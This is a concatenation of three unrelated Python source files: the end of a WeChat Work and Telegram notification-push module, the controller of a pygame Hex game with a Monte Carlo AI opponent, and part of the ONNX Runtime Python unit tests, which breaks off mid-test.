"https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token="
+ self.get_access_token()
)
send_values = {
"touser": touser,
"msgtype": "text",
"agentid": self.AGENTID,
"text": {"content": message},
"safe": "0",
}
send_msges = bytes(json.dumps(send_values), "utf-8")
respone = requests.post(send_url, send_msges)
respone = respone.json()
return respone["errmsg"]
def send_mpnews(self, title, message, media_id, touser="@all"):
send_url = (
"https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token="
+ self.get_access_token()
)
send_values = {
"touser": touser,
"msgtype": "mpnews",
"agentid": self.AGENTID,
"mpnews": {
"articles": [
{
"title": title,
"thumb_media_id": media_id,
"author": "Author",
"content_source_url": "",
"content": message.replace("\n", "<br/>"),
"digest": message,
}
]
},
}
send_msges = bytes(json.dumps(send_values), "utf-8")
respone = requests.post(send_url, send_msges)
respone = respone.json()
return respone["errmsg"]
def wecom_bot(title: str, content: str) -> None:
"""
通过 企业微信机器人 推送消息。
"""
if not push_config.get("QYWX_KEY"):
print("企业微信机器人 服务的 QYWX_KEY 未设置!!\n取消推送")
return
print("企业微信机器人服务启动")
url = f"https://qyapi.weixin.qq.com/cgi-bin/webhook/send?key={push_config.get('QYWX_KEY')}"
headers = {"Content-Type": "application/json;charset=utf-8"}
data = {"msgtype": "text", "text": {"content": f"{title}\n\n{content}"}}
response = requests.post(
url=url, data=json.dumps(data), headers=headers, timeout=15
).json()
if response["errcode"] == 0:
print("企业微信机器人推送成功!")
else:
print("企业微信机器人推送失败!")
def telegram_bot(title: str, content: str) -> None:
"""
使用 telegram 机器人 推送消息。
"""
if not push_config.get("TG_BOT_TOKEN") or not push_config.get("TG_USER_ID"):
print("tg 服务的 bot_token 或者 user_id 未设置!!\n取消推送")
return
print("tg 服务启动")
if push_config.get("TG_API_HOST"):
url = f"https://{push_config.get('TG_API_HOST')}/bot{push_config.get('TG_BOT_TOKEN')}/sendMessage"
else:
url = (
f"https://api.telegram.org/bot{push_config.get('TG_BOT_TOKEN')}/sendMessage"
)
headers = {"Content-Type": "application/x-www-form-urlencoded"}
payload = {
"chat_id": str(push_config.get("TG_USER_ID")),
"text": f"{title}\n\n{content}",
"disable_web_page_preview": "true",
}
proxies = None
if push_config.get("TG_PROXY_HOST") and push_config.get("TG_PROXY_PORT"):
if push_config.get("TG_PROXY_AUTH") is not None and "@" not in push_config.get(
"TG_PROXY_HOST"
):
push_config["TG_PROXY_HOST"] = (
push_config.get("TG_PROXY_AUTH")
+ "@"
+ push_config.get("TG_PROXY_HOST")
)
proxyStr = "http://{}:{}".format(
push_config.get("TG_PROXY_HOST"), push_config.get("TG_PROXY_PORT")
)
proxies = {"http": proxyStr, "https": proxyStr}
response = requests.post(
url=url, headers=headers, params=payload, proxies=proxies
).json()
if response["ok"]:
print("tg 推送成功!")
else:
print("tg 推送失败!")
def one() -> str:
"""
获取一条一言。
:return:
"""
url = "https://v1.hitokoto.cn/"
res = requests.get(url).json()
return res["hitokoto"] + " ----" + res["from"]
########################################配信方法结束#############################################
#####################################检测配信参数开始#############################################
if push_config.get("BARK_PUSH"):
notify_function.append(bark)
if push_config.get("CONSOLE"):
notify_function.append(console)
if push_config.get("DD_BOT_TOKEN") and push_config.get("DD_BOT_SECRET"):
notify_function.append(dingding_bot)
if push_config.get("FSKEY"):
notify_function.append(feishu_bot)
if push_config.get("GOBOT_URL") and push_config.get("GOBOT_QQ"):
notify_function.append(go_cqhttp)
if push_config.get("IGOT_PUSH_KEY"):
notify_function.append(iGot)
if push_config.get("PUSH_KEY"):
notify_function.append(serverJ)
if push_config.get("PUSH_PLUS_TOKEN"):
notify_function.append(pushplus_bot)
if push_config.get("QMSG_KEY") and push_config.get("QMSG_TYPE"):
notify_function.append(qmsg_bot)
if push_config.get("QYWX_AM"):
notify_function.append(wecom_app)
if push_config.get("QYWX_KEY"):
notify_function.append(wecom_bot)
if push_config.get("TG_BOT_TOKEN") and push_config.get("TG_USER_ID"):
notify_function.append(telegram_bot)
#####################################检测配信参数结束#############################################
def send(title: str, content: str) -> None:
if not content:
print(f"{title} 推送内容为空!")
return
hitokoto = push_config.get("HITOKOTO")
text = one() if hitokoto else ""
content += "\n\n" + text
ts = [
threading.Thread(target=mode, args=(title, content), name=mode.__name__)
for mode in notify_function
]
[t.start() for t in ts]
[t.join() for t in ts]
def main():
send("title", "content")
if __name__ == "__main__":
main()
|
controller.py
|
import pygame
import globvar
import monte_carlo
import logging
import threading
import time
class HexController():
def __init__(self):
self.STOPMSG = pygame.USEREVENT + 1
self.mouse_pos = (-1, -1)
self.pos_on_board = None
self.on_button = (False, None)
self.buttons = {"newgame": 0, "menu": 1, "REAL PLAYER": 2, "AI PLAYER": 2,
"undo": 3, "LEVEL": 4, "SIZE": 5, "START": 6, "CONTINUE": 7, "WIN %": 8, "QUIT": 9}
self.print_message = False
self.text = None
self.menu = True
# show winning percentage flag
self.show_win_p = False
def interaction(self):
'''
This function is the main interaction function, will always return true, unless user
click quit button, then game will end in the main.py
'''
# Did the user click the window close button?
for event in pygame.event.get():
if event.type == pygame.QUIT:
return False
elif event.type == pygame.MOUSEMOTION:
self.mouse_pos = pygame.mouse.get_pos()
if self.menu:
globvar.menu.draw_menu(self.mouse_pos)
else:
globvar.hex_brd.notify_update(self.mouse_pos, self.text)
if event.type == pygame.MOUSEBUTTONUP:
if event.button == 1:
if self.menu:
globvar.menu.draw_menu(self.mouse_pos)
elif self.pos_on_board != None:
win_color = self.win_color()[0]
if win_color == "":
# nobody wins yet
chess_status = globvar.hex_brd.place_chess(self.pos_on_board)
if chess_status == False and not self.on_button[0]:
# if user tring place on non empty cell
self.show_message('please place chess on empty position')
else:
# keep placed info, and check winner
globvar.hex_brd.notify_update(self.mouse_pos, self.text)
win_color,winner_num = self.win_color()
if win_color != "":
# there is a winner
print("winner is", win_color)
globvar.hex_ctrl.show_message('Player '+win_color+ ' has won')
# self.board = self.init_board()
win_path = globvar.hex_brd.winning_path(globvar.hex_brd.board, winner_num)
print("winning path is:", win_path, "\n")
globvar.hex_brd.win_path = win_path
elif globvar.hex_brd.current_mode == 1: # AI player mode
self.run_thread()
win_color,winner_num = self.win_color()
if win_color != "":
# if there is a winner
print("winner is", win_color)
globvar.hex_ctrl.show_message('Player '+ win_color + ' has won')
print("winner_num ",winner_num)
win_path = globvar.hex_brd.winning_path(globvar.hex_brd.board, winner_num)
print("winning path is:", win_path, "\n")
globvar.hex_brd.win_path = win_path
else:
# if someone won, user trying place..
self.show_message( 'Player ' + win_color + ' has won')
elif not self.on_button[0]:
if globvar.hex_brd.get_winner(globvar.hex_brd.board) == 2:
self.show_message('Do not place chess out of board')
if self.on_button[0]:
button = self.buttons[self.on_button[1].split(':')[0]]
if self.menu:
if not self.press_button(button): # return False if quit button is pressed
return False
if self.menu:
globvar.menu.draw_menu(self.mouse_pos)
else:
#button = self.buttons[self.on_button[1]]
if not self.press_button(button): # return False if quit button is pressed
return False
if not self.menu:
globvar.hex_brd.notify_update(self.mouse_pos, self.text)
if event.type == self.STOPMSG:
pygame.time.set_timer(self.STOPMSG, 0)
self.print_message = False
self.text = None
globvar.hex_brd.notify_update(self.mouse_pos, self.text)
return True
def win_color(self):
'''
This function will check win color, according to the winer number,
return winner's color
'''
win_color = ""
winner_num = globvar.hex_brd.get_winner(globvar.hex_brd.board)
if (winner_num) == 1:
win_color = "blue"
elif winner_num == 0:
win_color = "red"
return win_color, winner_num
def show_message(self, text):
'''
This function will call model to update, and message will lasting for a while
arguement text is the message want to be showed
'''
# design for show message
self.print_message = True
self.text = text
pygame.time.set_timer(self.STOPMSG, 1000)
globvar.hex_brd.notify_update(self.mouse_pos, text)
def press_button(self, button):
'''
This function will handle the procedure of pressing a button.
return True if not the quit button is pressed
False if quit button is pressed
'''
if button == 0: # new game button
globvar.hex_brd.new_game()
elif button == 1: # menu button
self.menu = True
globvar.menu.draw_menu(self.mouse_pos)
elif button == 2: # REAL PLAYER / AI PLAYER mode button
globvar.hex_brd.switch_mode()
elif button == 3: # undo button
if globvar.hex_brd.get_winner(globvar.hex_brd.board) == 2:
globvar.hex_brd.undo()
else:
self.show_message('Cannot Undo, Player'+str(globvar.hex_brd.get_winner(globvar.hex_brd.board)+1) +
' has won')
elif button == 4: # LEVEL (EASY / HARD) button
globvar.menu.level = (globvar.menu.level + 1) % 2
if globvar.menu.level == 0:
globvar.hex_brd.waiting_time = 1
else:
globvar.hex_brd.waiting_time = 10
elif button == 5: # SIZE (board size: 5x5 / 6x6) button
globvar.hex_brd.size = (5, 5) if globvar.hex_brd.size == (6, 6) else (6, 6)
globvar.hex_brd.new_game()
globvar.hex_brd.dump_Monte_Carlo_obj()
globvar.hex_brd.load_Monte_Carlo_Obj()
elif button == 6: # START (new game) button
self.menu = False
globvar.hex_brd.new_game()
globvar.hex_brd.notify_update(self.mouse_pos, self.text)
elif button == 7: # CONTINUE (previous game) button
self.menu = False
globvar.hex_brd.notify_update(self.mouse_pos, self.text)
elif button == 8: # SIMULATION button
self.show_win_p = not self.show_win_p
globvar.hex_brd.monte_carlo.activate = not globvar.hex_brd.monte_carlo.activate
globvar.hex_brd.current_show = (globvar.hex_brd.current_show + 1) % 2
else: # QUIT button
return False
return True
def run_thread(self):
'''
This function will run two thread:
Thread 1: Monte Carlo algorithm move generation process
Thread 2: Count down message display
to avoid having the user stuck in the middle of the program without knowing
what is going on.
'''
# https://realpython.com/intro-to-python-threading/
gen_move = threading.Thread(target=self.move_thread_function, args=(1,))
print_loading = threading.Thread(target=self.print_thread_function, args=(2,))
print_loading.start()
gen_move.start()
print_loading.join()
gen_move.join()
pygame.event.clear()
def move_thread_function(self, name):
'''
This function is the process of the first thread. It will call the move function to
generate a move for the current board using Monte Carlo algorithm.
'''
print("generating next move ...")
globvar.hex_brd.move()
globvar.hex_brd.notify_update(self.mouse_pos, self.text)
print("done\n")
def print_thread_function(self, name):
'''
This functino is the process of the second thread. It will show the
count down message: loading ... X sec
where X is the number of seconds left for waiting. The waiting time depends on
the current level (1 sec if in EASY mode, 3 sec if in HARD mode).
'''
waiting_time = globvar.hex_brd.waiting_time - 1
while waiting_time > 0:
self.show_message("loading . . . " + str(waiting_time) + "s")
time.sleep(1)
waiting_time -= 1
|
onnxruntime_test_python.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# -*- coding: UTF-8 -*-
import gc
import os
import platform
import sys
import threading
import unittest
import numpy as np
from helper import get_name
import onnxruntime as onnxrt
from onnxruntime.capi.onnxruntime_pybind11_state import Fail
# handle change from python 3.8 and on where loading a dll from the current directory needs to be explicitly allowed.
if platform.system() == "Windows" and sys.version_info.major >= 3 and sys.version_info.minor >= 8:
os.add_dll_directory(os.getcwd())
available_providers = [provider for provider in onnxrt.get_available_providers()]
# TVM EP doesn't support:
# * calling Run() on different threads using the same session object
# * symbolic inputs
# * string inputs
# * byte type inputs
# * object type inputs
# * void type inputs
# * SequenceConstruct operator
# * custom operators
# * testSequenceInsert
# * testSequenceLength
available_providers_without_tvm = [
provider for provider in onnxrt.get_available_providers() if provider not in {"TvmExecutionProvider"}
]
class TestInferenceSession(unittest.TestCase):
def run_model(self, session_object, run_options):
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = session_object.get_inputs()[0].name
res = session_object.run([], {input_name: x}, run_options=run_options)
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testTvmImported(self):
if "TvmExecutionProvider" not in onnxrt.get_available_providers():
return
import tvm
self.assertTrue(tvm is not None)
def testModelSerialization(self):
try:
so = onnxrt.SessionOptions()
so.log_severity_level = 1
so.logid = "TestModelSerialization"
so.optimized_model_filepath = "./PythonApiTestOptimizedModel.onnx"
onnxrt.InferenceSession(
get_name("mul_1.onnx"),
sess_options=so,
providers=["CPUExecutionProvider"],
)
self.assertTrue(os.path.isfile(so.optimized_model_filepath))
except Fail as onnxruntime_error:
if (
str(onnxruntime_error) == "[ONNXRuntimeError] : 1 : FAIL : Unable to serialize model as it contains"
" compiled nodes. Please disable any execution providers which generate compiled nodes."
):
pass
else:
raise onnxruntime_error
def testGetProviders(self):
self.assertTrue("CPUExecutionProvider" in onnxrt.get_available_providers())
# get_all_providers() returns the default EP order from highest to lowest.
# CPUExecutionProvider should always be last.
self.assertTrue("CPUExecutionProvider" == onnxrt.get_all_providers()[-1])
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=onnxrt.get_available_providers())
self.assertTrue("CPUExecutionProvider" in sess.get_providers())
def testEnablingAndDisablingTelemetry(self):
onnxrt.disable_telemetry_events()
# no-op on non-Windows builds
# may be no-op on certain Windows builds based on build configuration
onnxrt.enable_telemetry_events()
def testSetProviders(self):
if "CUDAExecutionProvider" in onnxrt.get_available_providers():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=["CUDAExecutionProvider"])
# confirm that CUDA Provider is in list of registered providers.
self.assertTrue("CUDAExecutionProvider" in sess.get_providers())
# reset the session and register only CPU Provider.
sess.set_providers(["CPUExecutionProvider"])
# confirm only CPU Provider is registered now.
self.assertEqual(["CPUExecutionProvider"], sess.get_providers())
def testSetProvidersWithOptions(self):
if "TensorrtExecutionProvider" in onnxrt.get_available_providers():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=["TensorrtExecutionProvider"])
self.assertIn("TensorrtExecutionProvider", sess.get_providers())
options = sess.get_provider_options()
option = options["TensorrtExecutionProvider"]
self.assertIn("device_id", option)
self.assertIn("trt_max_partition_iterations", option)
self.assertIn("trt_min_subgraph_size", option)
self.assertIn("trt_max_workspace_size", option)
self.assertIn("trt_dump_subgraphs", option)
self.assertIn("trt_engine_cache_enable", option)
self.assertIn("trt_engine_cache_path", option)
self.assertIn("trt_force_sequential_engine_build", option)
max_partition_iterations = option["trt_max_partition_iterations"]
new_max_partition_iterations = int(max_partition_iterations) + 1
min_subgraph_size = option["trt_min_subgraph_size"]
new_min_subgraph_size = int(min_subgraph_size) + 1
ori_max_workspace_size = option["trt_max_workspace_size"]
new_max_workspace_size = int(ori_max_workspace_size) // 2
option = {}
option["trt_max_partition_iterations"] = new_max_partition_iterations
option["trt_min_subgraph_size"] = new_min_subgraph_size
option["trt_max_workspace_size"] = new_max_workspace_size
dump_subgraphs = "true"
option["trt_dump_subgraphs"] = dump_subgraphs
engine_cache_enable = "true"
option["trt_engine_cache_enable"] = engine_cache_enable
engine_cache_path = "./engine_cache"
option["trt_engine_cache_path"] = engine_cache_path
force_sequential_engine_build = "true"
option["trt_force_sequential_engine_build"] = force_sequential_engine_build
sess.set_providers(["TensorrtExecutionProvider"], [option])
options = sess.get_provider_options()
option = options["TensorrtExecutionProvider"]
self.assertEqual(
option["trt_max_partition_iterations"],
str(new_max_partition_iterations),
)
self.assertEqual(option["trt_min_subgraph_size"], str(new_min_subgraph_size))
self.assertEqual(option["trt_max_workspace_size"], str(new_max_workspace_size))
self.assertEqual(option["trt_dump_subgraphs"], "1")
self.assertEqual(option["trt_engine_cache_enable"], "1")
self.assertEqual(option["trt_engine_cache_path"], str(engine_cache_path))
self.assertEqual(option["trt_force_sequential_engine_build"], "1")
# We currently disable following test code since that not all test machines/GPUs have nvidia int8 capability
"""
int8_use_native_calibration_table = "false"
option['trt_int8_use_native_calibration_table'] = int8_use_native_calibration_table
int8_enable = "true"
option['trt_int8_enable'] = int8_enable
calib_table_name = '/home/onnxruntime/table.flatbuffers' # this file is not existed
option['trt_int8_calibration_table_name'] = calib_table_name
with self.assertRaises(RuntimeError):
sess.set_providers(['TensorrtExecutionProvider'], [option])
"""
if "CUDAExecutionProvider" in onnxrt.get_available_providers():
import ctypes
import sys
CUDA_SUCCESS = 0
def runBaseTest1():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=["CUDAExecutionProvider"])
self.assertTrue("CUDAExecutionProvider" in sess.get_providers())
option1 = {"device_id": 0}
sess.set_providers(["CUDAExecutionProvider"], [option1])
self.assertEqual(
["CUDAExecutionProvider", "CPUExecutionProvider"],
sess.get_providers(),
)
option2 = {"device_id": -1}
with self.assertRaises(RuntimeError):
sess.set_providers(["CUDAExecutionProvider"], [option2])
sess.set_providers(["CUDAExecutionProvider", "CPUExecutionProvider"], [option1, {}])
self.assertEqual(
["CUDAExecutionProvider", "CPUExecutionProvider"],
sess.get_providers(),
)
def runBaseTest2():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=["CUDAExecutionProvider"])
self.assertIn("CUDAExecutionProvider", sess.get_providers())
# test get/set of "gpu_mem_limit" configuration.
options = sess.get_provider_options()
self.assertIn("CUDAExecutionProvider", options)
option = options["CUDAExecutionProvider"]
self.assertIn("gpu_mem_limit", option)
ori_mem_limit = option["gpu_mem_limit"]
new_mem_limit = int(ori_mem_limit) // 2
option["gpu_mem_limit"] = new_mem_limit
sess.set_providers(["CUDAExecutionProvider"], [option])
options = sess.get_provider_options()
self.assertEqual(
options["CUDAExecutionProvider"]["gpu_mem_limit"],
str(new_mem_limit),
)
option["gpu_mem_limit"] = ori_mem_limit
sess.set_providers(["CUDAExecutionProvider"], [option])
options = sess.get_provider_options()
self.assertEqual(options["CUDAExecutionProvider"]["gpu_mem_limit"], ori_mem_limit)
def test_get_and_set_option_with_values(option_name, option_values):
provider_options = sess.get_provider_options()
self.assertIn("CUDAExecutionProvider", provider_options)
cuda_options = options["CUDAExecutionProvider"]
self.assertIn(option_name, cuda_options)
for option_value in option_values:
cuda_options[option_name] = option_value
sess.set_providers(["CUDAExecutionProvider"], [cuda_options])
new_provider_options = sess.get_provider_options()
self.assertEqual(
new_provider_options.get("CUDAExecutionProvider", {}).get(option_name),
str(option_value),
)
test_get_and_set_option_with_values("arena_extend_strategy", ["kNextPowerOfTwo", "kSameAsRequested"])
test_get_and_set_option_with_values("cudnn_conv_algo_search", ["DEFAULT", "EXHAUSTIVE", "HEURISTIC"])
test_get_and_set_option_with_values("do_copy_in_default_stream", [0, 1])
option["gpu_external_alloc"] = "0"
option["gpu_external_free"] = "0"
option["gpu_external_empty_cache"] = "0"
sess.set_providers(["CUDAExecutionProvider"], [option])
options = sess.get_provider_options()
self.assertEqual(options["CUDAExecutionProvider"]["gpu_external_alloc"], "0")
self.assertEqual(options["CUDAExecutionProvider"]["gpu_external_free"], "0")
self.assertEqual(options["CUDAExecutionProvider"]["gpu_external_empty_cache"], "0")
#
# Note: Tests that throw an exception leave an empty session due to how set_providers currently works,
# so run them last. Each set_providers call will attempt to re-create a session, so it's
# fine for a test that fails to run immediately after another one that fails.
# Alternatively a valid call to set_providers could be used to recreate the underlying session
# after a failed call.
#
option["arena_extend_strategy"] = "wrong_value"
with self.assertRaises(RuntimeError):
sess.set_providers(["CUDAExecutionProvider"], [option])
option["gpu_mem_limit"] = -1024
with self.assertRaises(RuntimeError):
sess.set_providers(["CUDAExecutionProvider"], [option])
option["gpu_mem_limit"] = 1024.1024
with self.assertRaises(RuntimeError):
sess.set_providers(["CUDAExecutionProvider"], [option])
option["gpu_mem_limit"] = "wrong_value"
with self.assertRaises(RuntimeError):
sess.set_providers(["CUDAExecutionProvider"], [option])
def getCudaDeviceCount():
import ctypes
num_device = ctypes.c_int()
result = ctypes.c_int()
error_str = ctypes.c_char_p()
result = cuda.cuInit(0)
result = cuda.cuDeviceGetCount(ctypes.byref(num_device))
if result != CUDA_SUCCESS:
cuda.cuGetErrorString(result, ctypes.byref(error_str))
print("cuDeviceGetCount failed with error code %d: %s" % (result, error_str.value.decode()))
return -1
return num_device.value
def setDeviceIdTest(i):
import ctypes
import onnxruntime as onnxrt
device = ctypes.c_int()
result = ctypes.c_int()
error_str = ctypes.c_char_p()
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=["CPUExecutionProvider"])
option = {"device_id": i}
sess.set_providers(["CUDAExecutionProvider"], [option])
self.assertEqual(
["CUDAExecutionProvider", "CPUExecutionProvider"],
sess.get_providers(),
)
result = cuda.cuCtxGetDevice(ctypes.byref(device))
if result != CUDA_SUCCESS:
cuda.cuGetErrorString(result, ctypes.byref(error_str))
print("cuCtxGetDevice failed with error code %d: %s" % (result, error_str.value.decode()))
self.assertEqual(result, CUDA_SUCCESS)
self.assertEqual(i, device.value)
def runAdvancedTest():
num_device = getCudaDeviceCount()
if num_device < 0:
return
# Configure session to be ready to run on all available cuda devices
for i in range(num_device):
setDeviceIdTest(i)
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=["CPUExecutionProvider"])
# configure session with invalid option values and that should fail
with self.assertRaises(RuntimeError):
option = {"device_id": num_device}
sess.set_providers(["CUDAExecutionProvider"], [option])
option = {"device_id": "invalid_value"}
sess.set_providers(["CUDAExecutionProvider"], [option])
# configure session with invalid option should fail
with self.assertRaises(RuntimeError):
option = {"invalid_option": 123}
sess.set_providers(["CUDAExecutionProvider"], [option])
libnames = ("libcuda.so", "libcuda.dylib", "cuda.dll")
for libname in libnames:
try:
cuda = ctypes.CDLL(libname)
runBaseTest1()
runBaseTest2()
runAdvancedTest()
except OSError:
continue
else:
break
else:
runBaseTest1()
runBaseTest2()
# raise OSError("could not load any of: " + ' '.join(libnames))
def testInvalidSetProviders(self):
with self.assertRaises(RuntimeError) as context:
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=["CPUExecutionProvider"])
sess.set_providers(["InvalidProvider"])
self.assertTrue("Unknown Provider Type: InvalidProvider" in str(context.exception))
def testSessionProviders(self):
if "CUDAExecutionProvider" in onnxrt.get_available_providers():
# create session from scratch, but constrain it to only use the CPU.
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=["CPUExecutionProvider"])
self.assertEqual(["CPUExecutionProvider"], sess.get_providers())
def testRunModel(self):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=available_providers)
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 2])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModelFromBytes(self):
with open(get_name("mul_1.onnx"), "rb") as f:
content = f.read()
sess = onnxrt.InferenceSession(content, providers=onnxrt.get_available_providers())
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 2])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModel2(self):
sess = onnxrt.InferenceSession(get_name("matmul_1.onnx"), providers=onnxrt.get_available_providers())
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModel2Contiguous(self):
sess = onnxrt.InferenceSession(get_name("matmul_1.onnx"), providers=onnxrt.get_available_providers())
x = np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]], dtype=np.float32)[:, [1, 0]]
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
xcontiguous = np.ascontiguousarray(x)
rescontiguous = sess.run([output_name], {input_name: xcontiguous})
np.testing.assert_allclose(output_expected, rescontiguous[0], rtol=1e-05, atol=1e-08)
def testRunModelMultipleThreads(self):
# Skip this test for a "pure" DML onnxruntime python wheel.
# We keep this test enabled for instances where both DML and CUDA EPs are available
# (Windows GPU CI pipeline has this config) - this test will pass because CUDA has higher precedence
# than DML and the nodes are assigned to only the CUDA EP (which supports this test).
if "DmlExecutionProvider" in available_providers and "CUDAExecutionProvider" not in available_providers:
print(
"Skipping testRunModelMultipleThreads as the DML EP does not support calling Run()"
" on different threads using the same session object."
)
else:
so = onnxrt.SessionOptions()
so.log_verbosity_level = 1
so.logid = "MultiThreadsTest"
sess = onnxrt.InferenceSession(
get_name("mul_1.onnx"),
sess_options=so,
providers=available_providers_without_tvm,
)
ro1 = onnxrt.RunOptions()
ro1.logid = "thread1"
t1 = threading.Thread(target=self.run_model, args=(sess, ro1))
ro2 = onnxrt.RunOptions()
ro2.logid = "thread2"
t2 = threading.Thread(target=self.run_model, args=(sess, ro2))
t1.start()
t2.start()
t1.join()
t2.join()
def testListAsInput(self):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=onnxrt.get_available_providers())
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
res = sess.run([], {input_name: x.tolist()})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testStringListAsInput(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"), providers=available_providers_without_tvm)
x = np.array(["this", "is", "identity", "test"], dtype=str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
res = sess.run([], {x_name: x.tolist()})
np.testing.assert_equal(x, res[0])
def testRunDevice(self):
device = onnxrt.get_device()
self.assertTrue("CPU" in device or "GPU" in device)
def testRunModelSymbolicInput(self):
sess = onnxrt.InferenceSession(get_name("matmul_2.onnx"), providers=available_providers_without_tvm)
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
# Input X has an unknown dimension.
self.assertEqual(input_shape, ["None", 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
# Output X has an unknown dimension.
self.assertEqual(output_shape, ["None", 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testBooleanInputs(self):
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"), providers=available_providers)
a = np.array([[True, True], [False, False]], dtype=bool)
b = np.array([[True, False], [True, False]], dtype=bool)
# input1:0 is first in the protobuf, and input:0 is second
# and we maintain the original order.
a_name = sess.get_inputs()[0].name
self.assertEqual(a_name, "input1:0")
a_shape = sess.get_inputs()[0].shape
self.assertEqual(a_shape, [2, 2])
a_type = sess.get_inputs()[0].type
self.assertEqual(a_type, "tensor(bool)")
b_name = sess.get_inputs()[1].name
self.assertEqual(b_name, "input:0")
b_shape = sess.get_inputs()[1].shape
self.assertEqual(b_shape, [2, 2])
b_type = sess.get_inputs()[0].type
self.assertEqual(b_type, "tensor(bool)")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, "tensor(bool)")
output_expected = np.array([[True, False], [False, False]], dtype=bool)
res = sess.run([output_name], {a_name: a, b_name: b})
np.testing.assert_equal(output_expected, res[0])
def testStringInput1(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"), providers=available_providers_without_tvm)
x = np.array(["this", "is", "identity", "test"], dtype=str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, "tensor(string)")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, "tensor(string)")
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testStringInput2(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"), providers=available_providers_without_tvm)
x = np.array(["Olá", "你好", "여보세요", "hello"], dtype=str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, "tensor(string)")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
